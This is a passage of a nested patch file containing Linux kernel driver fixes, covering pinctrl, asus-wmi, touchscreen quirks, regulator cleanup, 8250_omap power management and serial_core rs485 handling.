+-	/* Active state selected in phy_mdm6600_power_on() */
+-	error = pinctrl_pm_select_sleep_state(ddata->dev);
+-	if (error)
+-		dev_warn(ddata->dev, "%s: error with sleep_state: %i\n",
+-			 __func__, error);
+-
+ 	error = phy_mdm6600_init_lines(ddata);
+ 	if (error)
+ 		return error;
+@@ -627,10 +622,12 @@ idle:
+ 	pm_runtime_put_autosuspend(ddata->dev);
+ 
+ cleanup:
+-	if (error < 0)
++	if (error < 0) {
+ 		phy_mdm6600_device_power_off(ddata);
+-	pm_runtime_disable(ddata->dev);
+-	pm_runtime_dont_use_autosuspend(ddata->dev);
++		pm_runtime_disable(ddata->dev);
++		pm_runtime_dont_use_autosuspend(ddata->dev);
++	}
++
+ 	return error;
+ }
+ 
+@@ -639,6 +636,7 @@ static int phy_mdm6600_remove(struct platform_device *pdev)
+ 	struct phy_mdm6600 *ddata = platform_get_drvdata(pdev);
+ 	struct gpio_desc *reset_gpio = ddata->ctrl_gpios[PHY_MDM6600_RESET];
+ 
++	pm_runtime_get_noresume(ddata->dev);
+ 	pm_runtime_dont_use_autosuspend(ddata->dev);
+ 	pm_runtime_put_sync(ddata->dev);
+ 	pm_runtime_disable(ddata->dev);
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 27e41873c04ff..9e57f4c62e609 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1007,20 +1007,17 @@ static int add_setting(struct pinctrl *p, struct pinctrl_dev *pctldev,
+ 
+ static struct pinctrl *find_pinctrl(struct device *dev)
+ {
+-	struct pinctrl *entry, *p = NULL;
++	struct pinctrl *p;
+ 
+ 	mutex_lock(&pinctrl_list_mutex);
+-
+-	list_for_each_entry(entry, &pinctrl_list, node) {
+-		if (entry->dev == dev) {
+-			p = entry;
+-			kref_get(&p->users);
+-			break;
++	list_for_each_entry(p, &pinctrl_list, node)
++		if (p->dev == dev) {
++			mutex_unlock(&pinctrl_list_mutex);
++			return p;
+ 		}
+-	}
+ 
+ 	mutex_unlock(&pinctrl_list_mutex);
+-	return p;
++	return NULL;
+ }
+ 
+ static void pinctrl_free(struct pinctrl *p, bool inlist);
+@@ -1129,6 +1126,7 @@ struct pinctrl *pinctrl_get(struct device *dev)
+ 	p = find_pinctrl(dev);
+ 	if (p) {
+ 		dev_dbg(dev, "obtain a copy of previously claimed pinctrl\n");
++		kref_get(&p->users);
+ 		return p;
+ 	}
+ 
+diff --git a/drivers/platform/surface/surface_platform_profile.c b/drivers/platform/surface/surface_platform_profile.c
+index fbf2e11fd6ce7..37c761f577149 100644
+--- a/drivers/platform/surface/surface_platform_profile.c
++++ b/drivers/platform/surface/surface_platform_profile.c
+@@ -159,8 +159,7 @@ static int surface_platform_profile_probe(struct ssam_device *sdev)
+ 	set_bit(PLATFORM_PROFILE_BALANCED_PERFORMANCE, tpd->handler.choices);
+ 	set_bit(PLATFORM_PROFILE_PERFORMANCE, tpd->handler.choices);
+ 
+-	platform_profile_register(&tpd->handler);
+-	return 0;
++	return platform_profile_register(&tpd->handler);
+ }
+ 
+ static void surface_platform_profile_remove(struct ssam_device *sdev)
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index d85d895fee894..df1db54d4e183 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -531,6 +531,9 @@ static void asus_nb_wmi_quirks(struct asus_wmi_driver *driver)
+ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, ASUS_WMI_BRN_DOWN, { KEY_BRIGHTNESSDOWN } },
+ 	{ KE_KEY, ASUS_WMI_BRN_UP, { KEY_BRIGHTNESSUP } },
++	{ KE_KEY, 0x2a, { KEY_SELECTIVE_SCREENSHOT } },
++	{ KE_IGNORE, 0x2b, }, /* PrintScreen (also sent via PS/2) on newer models */
++	{ KE_IGNORE, 0x2c, }, /* CapsLock (also sent via PS/2) on newer models */
+ 	{ KE_KEY, 0x30, { KEY_VOLUMEUP } },
+ 	{ KE_KEY, 0x31, { KEY_VOLUMEDOWN } },
+ 	{ KE_KEY, 0x32, { KEY_MUTE } },
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 36effe04c6f33..49dd55b8e8faf 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -3268,7 +3268,6 @@ static void asus_wmi_handle_event_code(int code, struct asus_wmi *asus)
+ {
+ 	unsigned int key_value = 1;
+ 	bool autorelease = 1;
+-	int orig_code = code;
+ 
+ 	if (asus->driver->key_filter) {
+ 		asus->driver->key_filter(asus->driver, &code, &key_value,
+@@ -3277,16 +3276,10 @@ static void asus_wmi_handle_event_code(int code, struct asus_wmi *asus)
+ 			return;
+ 	}
+ 
+-	if (code >= NOTIFY_BRNUP_MIN && code <= NOTIFY_BRNUP_MAX)
+-		code = ASUS_WMI_BRN_UP;
+-	else if (code >= NOTIFY_BRNDOWN_MIN && code <= NOTIFY_BRNDOWN_MAX)
+-		code = ASUS_WMI_BRN_DOWN;
+-
+-	if (code == ASUS_WMI_BRN_DOWN || code == ASUS_WMI_BRN_UP) {
+-		if (acpi_video_get_backlight_type() == acpi_backlight_vendor) {
+-			asus_wmi_backlight_notify(asus, orig_code);
+-			return;
+-		}
++	if (acpi_video_get_backlight_type() == acpi_backlight_vendor &&
++	    code >= NOTIFY_BRNUP_MIN && code <= NOTIFY_BRNDOWN_MAX) {
++		asus_wmi_backlight_notify(asus, code);
++		return;
+ 	}
+ 
+ 	if (code == NOTIFY_KBD_BRTUP) {
+diff --git a/drivers/platform/x86/asus-wmi.h b/drivers/platform/x86/asus-wmi.h
+index a478ebfd34dfa..fc41d1b1bb7f8 100644
+--- a/drivers/platform/x86/asus-wmi.h
++++ b/drivers/platform/x86/asus-wmi.h
+@@ -18,7 +18,7 @@
+ #include <linux/i8042.h>
+ 
+ #define ASUS_WMI_KEY_IGNORE (-1)
+-#define ASUS_WMI_BRN_DOWN	0x20
++#define ASUS_WMI_BRN_DOWN	0x2e
+ #define ASUS_WMI_BRN_UP		0x2f
+ 
+ struct module;
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index fa8f14c925ec3..9b12fe8e95c91 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -153,7 +153,7 @@ show_uncore_data(initial_max_freq_khz);
+ 
+ static int create_attr_group(struct uncore_data *data, char *name)
+ {
+-	int ret, index = 0;
++	int ret, freq, index = 0;
+ 
+ 	init_attribute_rw(max_freq_khz);
+ 	init_attribute_rw(min_freq_khz);
+@@ -165,7 +165,11 @@ static int create_attr_group(struct uncore_data *data, char *name)
+ 	data->uncore_attrs[index++] = &data->min_freq_khz_dev_attr.attr;
+ 	data->uncore_attrs[index++] = &data->initial_min_freq_khz_dev_attr.attr;
+ 	data->uncore_attrs[index++] = &data->initial_max_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->current_freq_khz_dev_attr.attr;
++
++	ret = uncore_read_freq(data, &freq);
++	if (!ret)
++		data->uncore_attrs[index++] = &data->current_freq_khz_dev_attr.attr;
++
+ 	data->uncore_attrs[index] = NULL;
+ 
+ 	data->uncore_attr_group.name = name;
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 68e66b60445c3..9a92d515abb9b 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -740,6 +740,21 @@ static const struct ts_dmi_data pipo_w11_data = {
+ 	.properties	= pipo_w11_props,
+ };
+ 
++static const struct property_entry positivo_c4128b_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 4),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 13),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1915),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1269),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-positivo-c4128b.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	{ }
++};
++
++static const struct ts_dmi_data positivo_c4128b_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= positivo_c4128b_props,
++};
++
+ static const struct property_entry pov_mobii_wintab_p800w_v20_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-min-x", 32),
+ 	PROPERTY_ENTRY_U32("touchscreen-min-y", 16),
+@@ -1457,6 +1472,14 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "MOMO.G.WI71C.MABMRBA02"),
+ 		},
+ 	},
++	{
++		/* Positivo C4128B */
++		.driver_data = (void *)&positivo_c4128b_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "C4128B-1"),
++		},
++	},
+ 	{
+ 		/* Point of View mobii wintab p800w (v2.0) */
+ 		.driver_data = (void *)&pov_mobii_wintab_p800w_v20_data,
+diff --git a/drivers/power/reset/Kconfig b/drivers/power/reset/Kconfig
+index a8c46ba5878fe..54201f0374104 100644
+--- a/drivers/power/reset/Kconfig
++++ b/drivers/power/reset/Kconfig
+@@ -299,7 +299,7 @@ config NVMEM_REBOOT_MODE
+ 
+ config POWER_MLXBF
+ 	tristate "Mellanox BlueField power handling driver"
+-	depends on (GPIO_MLXBF2 && ACPI)
++	depends on (GPIO_MLXBF2 || GPIO_MLXBF3) && ACPI
+ 	help
+ 	  This driver supports reset or low power mode handling for Mellanox BlueField.
+ 
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index f6a95f72af18d..34d3d82819064 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -5725,15 +5725,11 @@ wash:
+ 	mutex_lock(&regulator_list_mutex);
+ 	regulator_ena_gpio_free(rdev);
+ 	mutex_unlock(&regulator_list_mutex);
+-	put_device(&rdev->dev);
+-	rdev = NULL;
+ clean:
+ 	if (dangling_of_gpiod)
+ 		gpiod_put(config->ena_gpiod);
+-	if (rdev && rdev->dev.of_node)
+-		of_node_put(rdev->dev.of_node);
+-	kfree(rdev);
+ 	kfree(config);
++	put_device(&rdev->dev);
+ rinse:
+ 	if (dangling_cfg_gpiod)
+ 		gpiod_put(cfg->ena_gpiod);
+diff --git a/drivers/s390/cio/css.c b/drivers/s390/cio/css.c
+index c7db953985002..98a14c1f3d672 100644
+--- a/drivers/s390/cio/css.c
++++ b/drivers/s390/cio/css.c
+@@ -233,17 +233,19 @@ struct subchannel *css_alloc_subchannel(struct subchannel_id schid,
+ 	 */
+ 	ret = dma_set_coherent_mask(&sch->dev, DMA_BIT_MASK(31));
+ 	if (ret)
+-		goto err;
++		goto err_lock;
+ 	/*
+ 	 * But we don't have such restrictions imposed on the stuff that
+ 	 * is handled by the streaming API.
+ 	 */
+ 	ret = dma_set_mask(&sch->dev, DMA_BIT_MASK(64));
+ 	if (ret)
+-		goto err;
++		goto err_lock;
+ 
+ 	return sch;
+ 
++err_lock:
++	kfree(sch->lock);
+ err:
+ 	kfree(sch);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index adc85e250822c..2e21f74a24705 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -32,6 +32,7 @@
+ #include "8250.h"
+ 
+ #define DEFAULT_CLK_SPEED	48000000
++#define OMAP_UART_REGSHIFT	2
+ 
+ #define UART_ERRATA_i202_MDR1_ACCESS	(1 << 0)
+ #define OMAP_UART_WER_HAS_TX_WAKEUP	(1 << 1)
+@@ -109,6 +110,7 @@
+ #define UART_OMAP_RX_LVL		0x19
+ 
+ struct omap8250_priv {
++	void __iomem *membase;
+ 	int line;
+ 	u8 habit;
+ 	u8 mdr1;
+@@ -152,9 +154,9 @@ static void omap_8250_rx_dma_flush(struct uart_8250_port *p);
+ static inline void omap_8250_rx_dma_flush(struct uart_8250_port *p) { }
+ #endif
+ 
+-static u32 uart_read(struct uart_8250_port *up, u32 reg)
++static u32 uart_read(struct omap8250_priv *priv, u32 reg)
+ {
+-	return readl(up->port.membase + (reg << up->port.regshift));
++	return readl(priv->membase + (reg << OMAP_UART_REGSHIFT));
+ }
+ 
+ /*
+@@ -538,7 +540,7 @@ static void omap_serial_fill_features_erratas(struct uart_8250_port *up,
+ 	u32 mvr, scheme;
+ 	u16 revision, major, minor;
+ 
+-	mvr = uart_read(up, UART_OMAP_MVER);
++	mvr = uart_read(priv, UART_OMAP_MVER);
+ 
+ 	/* Check revision register scheme */
+ 	scheme = mvr >> OMAP_UART_MVR_SCHEME_SHIFT;
+@@ -1319,7 +1321,7 @@ static int omap8250_probe(struct platform_device *pdev)
+ 		UPF_HARD_FLOW;
+ 	up.port.private_data = priv;
+ 
+-	up.port.regshift = 2;
++	up.port.regshift = OMAP_UART_REGSHIFT;
+ 	up.port.fifosize = 64;
+ 	up.tx_loadsz = 64;
+ 	up.capabilities = UART_CAP_FIFO;
+@@ -1381,6 +1383,8 @@ static int omap8250_probe(struct platform_device *pdev)
+ 			 DEFAULT_CLK_SPEED);
+ 	}
+ 
++	priv->membase = membase;
++	priv->line = -ENODEV;
+ 	priv->latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	priv->calc_latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+ 	cpu_latency_qos_add_request(&priv->pm_qos_request, priv->latency);
+@@ -1388,6 +1392,8 @@ static int omap8250_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&priv->rx_dma_lock);
+ 
++	platform_set_drvdata(pdev, priv);
++
+ 	device_init_wakeup(&pdev->dev, true);
+ 	pm_runtime_enable(&pdev->dev);
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+@@ -1449,7 +1455,6 @@ static int omap8250_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 	priv->line = ret;
+-	platform_set_drvdata(pdev, priv);
+ 	pm_runtime_mark_last_busy(&pdev->dev);
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+ 	return 0;
+@@ -1471,17 +1476,17 @@ static int omap8250_remove(struct platform_device *pdev)
+ 	if (err)
+ 		return err;
+ 
++	serial8250_unregister_port(priv->line);
++	priv->line = -ENODEV;
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	flush_work(&priv->qos_work);
+ 	pm_runtime_disable(&pdev->dev);
+-	serial8250_unregister_port(priv->line);
+ 	cpu_latency_qos_remove_request(&priv->pm_qos_request);
+ 	device_init_wakeup(&pdev->dev, false);
+ 	return 0;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+ static int omap8250_prepare(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+@@ -1505,7 +1510,7 @@ static int omap8250_suspend(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+ 	struct uart_8250_port *up = serial8250_get_port(priv->line);
+-	int err;
++	int err = 0;
+ 
+ 	serial8250_suspend_port(priv->line);
+ 
+@@ -1515,7 +1520,8 @@ static int omap8250_suspend(struct device *dev)
+ 	if (!device_may_wakeup(dev))
+ 		priv->wer = 0;
+ 	serial_out(up, UART_OMAP_WER, priv->wer);
+-	err = pm_runtime_force_suspend(dev);
++	if (uart_console(&up->port) && console_suspend_enabled)
++		err = pm_runtime_force_suspend(dev);
+ 	flush_work(&priv->qos_work);
+ 
+ 	return err;
+@@ -1524,11 +1530,15 @@ static int omap8250_suspend(struct device *dev)
+ static int omap8250_resume(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
++	struct uart_8250_port *up = serial8250_get_port(priv->line);
+ 	int err;
+ 
+-	err = pm_runtime_force_resume(dev);
+-	if (err)
+-		return err;
++	if (uart_console(&up->port) && console_suspend_enabled) {
++		err = pm_runtime_force_resume(dev);
++		if (err)
++			return err;
++	}
++
+ 	serial8250_resume_port(priv->line);
+ 	/* Paired with pm_runtime_resume_and_get() in omap8250_suspend() */
+ 	pm_runtime_mark_last_busy(dev);
+@@ -1536,12 +1546,7 @@ static int omap8250_resume(struct device *dev)
+ 
+ 	return 0;
+ }
+-#else
+-#define omap8250_prepare NULL
+-#define omap8250_complete NULL
+-#endif
+ 
+-#ifdef CONFIG_PM
+ static int omap8250_lost_context(struct uart_8250_port *up)
+ {
+ 	u32 val;
+@@ -1557,11 +1562,15 @@ static int omap8250_lost_context(struct uart_8250_port *up)
+ 	return 0;
+ }
+ 
++static void uart_write(struct omap8250_priv *priv, u32 reg, u32 val)
++{
++	writel(val, priv->membase + (reg << OMAP_UART_REGSHIFT));
++}
++
+ /* TODO: in future, this should happen via API in drivers/reset/ */
+ static int omap8250_soft_reset(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+-	struct uart_8250_port *up = serial8250_get_port(priv->line);
+ 	int timeout = 100;
+ 	int sysc;
+ 	int syss;
+@@ -1575,20 +1584,20 @@ static int omap8250_soft_reset(struct device *dev)
+ 	 * needing omap8250_soft_reset() quirk. Do it in two writes as
+ 	 * recommended in the comment for omap8250_update_scr().
+ 	 */
+-	serial_out(up, UART_OMAP_SCR, OMAP_UART_SCR_DMAMODE_1);
+-	serial_out(up, UART_OMAP_SCR,
++	uart_write(priv, UART_OMAP_SCR, OMAP_UART_SCR_DMAMODE_1);
++	uart_write(priv, UART_OMAP_SCR,
+ 		   OMAP_UART_SCR_DMAMODE_1 | OMAP_UART_SCR_DMAMODE_CTL);
+ 
+-	sysc = serial_in(up, UART_OMAP_SYSC);
++	sysc = uart_read(priv, UART_OMAP_SYSC);
+ 
+ 	/* softreset the UART */
+ 	sysc |= OMAP_UART_SYSC_SOFTRESET;
+-	serial_out(up, UART_OMAP_SYSC, sysc);
++	uart_write(priv, UART_OMAP_SYSC, sysc);
+ 
+ 	/* By experiment, 1us is enough for the reset to complete on AM335x */
+ 	do {
+ 		udelay(1);
+-		syss = serial_in(up, UART_OMAP_SYSS);
++		syss = uart_read(priv, UART_OMAP_SYSS);
+ 	} while (--timeout && !(syss & OMAP_UART_SYSS_RESETDONE));
+ 
+ 	if (!timeout) {
+@@ -1602,23 +1611,10 @@ static int omap8250_soft_reset(struct device *dev)
+ static int omap8250_runtime_suspend(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+-	struct uart_8250_port *up;
++	struct uart_8250_port *up = NULL;
+ 
+-	/* In case runtime-pm tries this before we are setup */
+-	if (!priv)
+-		return 0;
+-
+-	up = serial8250_get_port(priv->line);
+-	/*
+-	 * When using 'no_console_suspend', the console UART must not be
+-	 * suspended. Since driver suspend is managed by runtime suspend,
+-	 * preventing runtime suspend (by returning error) will keep device
+-	 * active during suspend.
+-	 */
+-	if (priv->is_suspending && !console_suspend_enabled) {
+-		if (uart_console(&up->port))
+-			return -EBUSY;
+-	}
++	if (priv->line >= 0)
++		up = serial8250_get_port(priv->line);
+ 
+ 	if (priv->habit & UART_ERRATA_CLOCK_DISABLE) {
+ 		int ret;
+@@ -1627,13 +1623,15 @@ static int omap8250_runtime_suspend(struct device *dev)
+ 		if (ret)
+ 			return ret;
+ 
+-		/* Restore to UART mode after reset (for wakeup) */
+-		omap8250_update_mdr1(up, priv);
+-		/* Restore wakeup enable register */
+-		serial_out(up, UART_OMAP_WER, priv->wer);
++		if (up) {
++			/* Restore to UART mode after reset (for wakeup) */
++			omap8250_update_mdr1(up, priv);
++			/* Restore wakeup enable register */
++			serial_out(up, UART_OMAP_WER, priv->wer);
++		}
+ 	}
+ 
+-	if (up->dma && up->dma->rxchan)
++	if (up && up->dma && up->dma->rxchan)
+ 		omap_8250_rx_dma_flush(up);
+ 
+ 	priv->latency = PM_QOS_CPU_LATENCY_DEFAULT_VALUE;
+@@ -1645,25 +1643,21 @@ static int omap8250_runtime_suspend(struct device *dev)
+ static int omap8250_runtime_resume(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+-	struct uart_8250_port *up;
++	struct uart_8250_port *up = NULL;
+ 
+-	/* In case runtime-pm tries this before we are setup */
+-	if (!priv)
+-		return 0;
+-
+-	up = serial8250_get_port(priv->line);
++	if (priv->line >= 0)
++		up = serial8250_get_port(priv->line);
+ 
+-	if (omap8250_lost_context(up))
++	if (up && omap8250_lost_context(up))
+ 		omap8250_restore_regs(up);
+ 
+-	if (up->dma && up->dma->rxchan && !(priv->habit & UART_HAS_EFR2))
++	if (up && up->dma && up->dma->rxchan && !(priv->habit & UART_HAS_EFR2))
+ 		omap_8250_rx_dma(up);
+ 
+ 	priv->latency = priv->calc_latency;
+ 	schedule_work(&priv->qos_work);
+ 	return 0;
+ }
+-#endif
+ 
+ #ifdef CONFIG_SERIAL_8250_OMAP_TTYO_FIXUP
+ static int __init omap8250_console_fixup(void)
+@@ -1706,17 +1700,17 @@ console_initcall(omap8250_console_fixup);
+ #endif
+ 
+ static const struct dev_pm_ops omap8250_dev_pm_ops = {
+-	SET_SYSTEM_SLEEP_PM_OPS(omap8250_suspend, omap8250_resume)
+-	SET_RUNTIME_PM_OPS(omap8250_runtime_suspend,
++	SYSTEM_SLEEP_PM_OPS(omap8250_suspend, omap8250_resume)
++	RUNTIME_PM_OPS(omap8250_runtime_suspend,
+ 			   omap8250_runtime_resume, NULL)
+-	.prepare        = omap8250_prepare,
+-	.complete       = omap8250_complete,
++	.prepare        = pm_sleep_ptr(omap8250_prepare),
++	.complete       = pm_sleep_ptr(omap8250_complete),
+ };
+ 
+ static struct platform_driver omap8250_platform_driver = {
+ 	.driver = {
+ 		.name		= "omap8250",
+-		.pm		= &omap8250_dev_pm_ops,
++		.pm		= pm_ptr(&omap8250_dev_pm_ops),
+ 		.of_match_table = omap8250_dt_ids,
+ 	},
+ 	.probe			= omap8250_probe,
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index 2cc5c68c8689f..d4e57f9017db9 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -48,8 +48,6 @@ static struct lock_class_key port_lock_key;
+  */
+ #define RS485_MAX_RTS_DELAY	100 /* msecs */
+ 
+-static void uart_change_speed(struct tty_struct *tty, struct uart_state *state,
+-			      const struct ktermios *old_termios);
+ static void uart_wait_until_sent(struct tty_struct *tty, int timeout);
+ static void uart_change_pm(struct uart_state *state,
+ 			   enum uart_pm_state pm_state);
+@@ -177,6 +175,52 @@ static void uart_port_dtr_rts(struct uart_port *uport, int raise)
+ 		uart_clear_mctrl(uport, TIOCM_DTR | TIOCM_RTS);
+ }
+ 
++/* Caller holds port mutex */
++static void uart_change_line_settings(struct tty_struct *tty, struct uart_state *state,
++				      const struct ktermios *old_termios)
++{
++	struct uart_port *uport = uart_port_check(state);
++	struct ktermios *termios;
++	int hw_stopped;
++
++	/*
++	 * If we have no tty, termios, or the port does not exist,
++	 * then we can't set the parameters for this port.
++	 */
++	if (!tty || uport->type == PORT_UNKNOWN)
++		return;
++
++	termios = &tty->termios;
++	uport->ops->set_termios(uport, termios, old_termios);
++
++	/*
++	 * Set modem status enables based on termios cflag
++	 */
++	spin_lock_irq(&uport->lock);
++	if (termios->c_cflag & CRTSCTS)
++		uport->status |= UPSTAT_CTS_ENABLE;
++	else
++		uport->status &= ~UPSTAT_CTS_ENABLE;
++
++	if (termios->c_cflag & CLOCAL)
++		uport->status &= ~UPSTAT_DCD_ENABLE;
++	else
++		uport->status |= UPSTAT_DCD_ENABLE;
++
++	/* reset sw-assisted CTS flow control based on (possibly) new mode */
++	hw_stopped = uport->hw_stopped;
++	uport->hw_stopped = uart_softcts_mode(uport) &&
++			    !(uport->ops->get_mctrl(uport) & TIOCM_CTS);
++	if (uport->hw_stopped) {
++		if (!hw_stopped)
++			uport->ops->stop_tx(uport);
++	} else {
++		if (hw_stopped)
++			__uart_start(tty);
++	}
++	spin_unlock_irq(&uport->lock);
++}
++
+ /*
+  * Startup the port.  This will be called once per open.  All calls
+  * will be serialised by the per-port mutex.
+@@ -232,7 +276,7 @@ static int uart_port_startup(struct tty_struct *tty, struct uart_state *state,
+ 		/*
+ 		 * Initialise the hardware port settings.
+ 		 */
+-		uart_change_speed(tty, state, NULL);
++		uart_change_line_settings(tty, state, NULL);
+ 
+ 		/*
+ 		 * Setup the RTS and DTR signals once the
+@@ -485,52 +529,6 @@ uart_get_divisor(struct uart_port *port, unsigned int baud)
+ }
+ EXPORT_SYMBOL(uart_get_divisor);
+ 
+-/* Caller holds port mutex */
+-static void uart_change_speed(struct tty_struct *tty, struct uart_state *state,
+-			      const struct ktermios *old_termios)
+-{
+-	struct uart_port *uport = uart_port_check(state);
+-	struct ktermios *termios;
+-	int hw_stopped;
+-
+-	/*
+-	 * If we have no tty, termios, or the port does not exist,
+-	 * then we can't set the parameters for this port.
+-	 */
+-	if (!tty || uport->type == PORT_UNKNOWN)
+-		return;
+-
+-	termios = &tty->termios;
+-	uport->ops->set_termios(uport, termios, old_termios);
+-
+-	/*
+-	 * Set modem status enables based on termios cflag
+-	 */
+-	spin_lock_irq(&uport->lock);
+-	if (termios->c_cflag & CRTSCTS)
+-		uport->status |= UPSTAT_CTS_ENABLE;
+-	else
+-		uport->status &= ~UPSTAT_CTS_ENABLE;
+-
+-	if (termios->c_cflag & CLOCAL)
+-		uport->status &= ~UPSTAT_DCD_ENABLE;
+-	else
+-		uport->status |= UPSTAT_DCD_ENABLE;
+-
+-	/* reset sw-assisted CTS flow control based on (possibly) new mode */
+-	hw_stopped = uport->hw_stopped;
+-	uport->hw_stopped = uart_softcts_mode(uport) &&
+-				!(uport->ops->get_mctrl(uport) & TIOCM_CTS);
+-	if (uport->hw_stopped) {
+-		if (!hw_stopped)
+-			uport->ops->stop_tx(uport);
+-	} else {
+-		if (hw_stopped)
+-			__uart_start(tty);
+-	}
+-	spin_unlock_irq(&uport->lock);
+-}
+-
+ static int uart_put_char(struct tty_struct *tty, unsigned char c)
+ {
+ 	struct uart_state *state = tty->driver_data;
+@@ -994,7 +992,7 @@ static int uart_set_info(struct tty_struct *tty, struct tty_port *port,
+ 				      current->comm,
+ 				      tty_name(port->tty));
+ 			}
+-			uart_change_speed(tty, state, NULL);
++			uart_change_line_settings(tty, state, NULL);
+ 		}
+ 	} else {
+ 		retval = uart_startup(tty, state, 1);
+@@ -1389,12 +1387,18 @@ static void uart_set_rs485_termination(struct uart_port *port,
+ static int uart_rs485_config(struct uart_port *port)
+ {
+ 	struct serial_rs485 *rs485 = &port->rs485;
++	unsigned long flags;
+ 	int ret;
+ 
++	if (!(rs485->flags & SER_RS485_ENABLED))
++		return 0;
++
+ 	uart_sanitize_serial_rs485(port, rs485);
+ 	uart_set_rs485_termination(port, rs485);
+ 
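++	/* rs485_config() callbacks expect the port lock to be held */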
++	spin_lock_irqsave(&port->lock, flags);
+ 	ret = port->rs485_config(port, NULL, rs485);
++	spin_unlock_irqrestore(&port->lock, flags);
+ 	if (ret)
+ 		memset(rs485, 0, sizeof(*rs485));
+ 
+@@ -1656,7 +1660,7 @@ static void uart_set_termios(struct tty_struct *tty,
+ 		goto out;
+ 	}
+ 
+-	uart_change_speed(tty, state, old_termios);
++	uart_change_line_settings(tty, state, old_termios);
+ 	/* reload cflag from termios; port driver may have overridden flags */
+ 	cflag = tty->termios.c_cflag;
+ 
+@@ -2456,12 +2460,11 @@ int uart_resume_port(struct uart_driver *drv, struct uart_port *uport)
+ 			ret = ops->startup(uport);
+ 			if (ret == 0) {
+ 				if (tty)
+-					uart_change_speed(tty, state, NULL);
++					uart_change_line_settings(tty, state, NULL);
++				uart_rs485_config(uport);
+ 				spin_lock_irq(&uport->lock);
+ 				if (!(uport->rs485.flags & SER_RS485_ENABLED))
+ 					ops->set_mctrl(uport, uport->mctrl);
+-				else
+-					uart_rs485_config(uport);
+ 				ops->start_tx(uport);
+ 				spin_unlock_irq(&uport->lock);
+ 				tty_port_set_initialized(port, 1);
+@@ -2570,10 +2573,10 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 		port->mctrl &= TIOCM_DTR;
+ 		if (!(port->rs485.flags & SER_RS485_ENABLED))
+ 			port->ops->set_mctrl(port, port->mctrl);
+-		else
+-			uart_rs485_config(port);
+ 		spin_unlock_irqrestore(&port->lock, flags);
+ 
++		uart_rs485_config(port);
++
+ 		/*
+ 		 * If this driver supports console, and it hasn't been
+ 		 * successfully registered yet, try to re-register it.
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index 832d3ba9368ff..8edd0375e0a8a 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -329,6 +329,7 @@ static struct platform_driver onboard_hub_driver = {
+ 
+ /************************** USB driver **************************/
+ 
++#define VENDOR_ID_GENESYS	0x05e3
+ #define VENDOR_ID_MICROCHIP	0x0424
+ #define VENDOR_ID_REALTEK	0x0bda
+ #define VENDOR_ID_TI		0x0451
+@@ -405,6 +406,10 @@ static void onboard_hub_usbdev_disconnect(struct usb_device *udev)
+ }
+ 
+ static const struct usb_device_id onboard_hub_id_table[] = {
